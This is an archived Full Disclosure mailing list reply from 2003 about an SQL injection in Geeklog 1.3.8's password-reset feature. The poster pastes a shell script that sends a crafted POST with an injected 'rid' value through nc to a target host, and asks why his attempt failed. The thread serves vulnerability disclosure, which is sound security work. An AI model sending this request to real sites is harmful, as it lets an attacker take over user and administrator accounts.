Full Disclosure mailing list archives
Re: Geeklog exploit
From: Thomas Rogg <thomas () outcast-media com>
Date: Sun, 19 Oct 2003 20:15:15 +0200
am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko () iki fi:
... The exploit uses the "forgot password" feature introduced in Geeklog 1.3.8. By constructing a certain kind of HTTP request, an attacker can change any user's Geeklog password, including the administrator password. This is because an SQL injection problem. In users.php we have this kind of code (line about 750): ...
I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML says: "Your request for a new password has expired. Please try again below." Am I missing something? All I changed was to use HTTP/1.1 and to use parameters for host and path: ----- #!/bin/sh echo "POST $2users.php HTTP/1.1 Host: $1 Connection: close Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1& " | nc $1 80 ----- Thank you, Thomas _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Geeklog exploit Jouko Pynnonen (Oct 19)
- Re: Geeklog exploit Thomas Rogg (Oct 19)